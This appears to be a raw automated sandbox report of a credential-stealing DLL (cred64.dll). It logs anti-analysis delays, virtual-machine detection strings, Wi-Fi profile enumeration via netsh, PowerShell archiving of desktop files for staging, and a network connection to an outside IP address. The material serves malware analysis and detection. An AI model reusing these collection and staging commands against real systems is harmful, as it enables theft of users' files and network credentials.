    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7743Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1861Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8071
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1538
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6926
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1864
    Source: C:\Windows\System32\loaddll64.exe TID: 7804Thread sleep time: -120000s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6836Thread sleep count: 7743 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6836Thread sleep count: 1861 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2996Thread sleep time: -6456360425798339s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6212Thread sleep time: -5534023222112862s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 736Thread sleep time: -1844674407370954s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8020Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\loaddll64.exeThread delayed: delay time: 120000Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppDataJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Music\desktop.iniJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\OneDrive\desktop.iniJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\userJump to behavior
    Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\Videos\desktop.iniJump to behavior
    Source: rundll32.exe, 00000007.00000002.1518302251.00000163154CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: rundll32.exe, 00000007.00000002.1518302251.000001631546A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`;J
    Source: rundll32.exe, 00000007.00000002.1518302251.00000163154CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\o
    Source: rundll32.exe, 00000007.00000002.1518302251.000001631547B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:5^p]
    Source: rundll32.exe, 00000006.00000002.1513737500.000001E8C5BA9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1513737500.000001E8C5C31000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1518302251.000001631549F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1584469285.000001D6A16AB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1584469285.000001D6A1628000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: rundll32.exe, 00000006.00000002.1513737500.000001E8C5C31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\F
    Source: netsh.exe, 00000008.00000003.1289055163.000001E19D5E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^^w
    Source: rundll32.exe, 00000007.00000002.1518302251.000001631549F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: netsh.exe, 00000014.00000003.1351824765.00000246E9384000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: netsh.exe, 0000000A.00000003.1289106289.0000013D0BFD5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>>
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

    HIPS / PFW / Operating System Protection Evasion

    barindex
    System process connects to network (likely due to code injection or exploit)
    Source: C:\Windows\System32\rundll32.exeNetwork Connect: 185.196.8.37 80Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",#1Jump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel OptimalJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel OptimalJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel OptimalJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\NVWZAPQSQL.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV.docx VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\QCFWYSKMHA.docx VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\QCFWYSKMHA.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\SQSJKEBWDT.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL.docx VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\NVWZAPQSQL.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\PIVFAGEAAV.docx VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\QCFWYSKMHA.docx VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\QCFWYSKMHA.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\SQSJKEBWDT.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
    Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
    Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
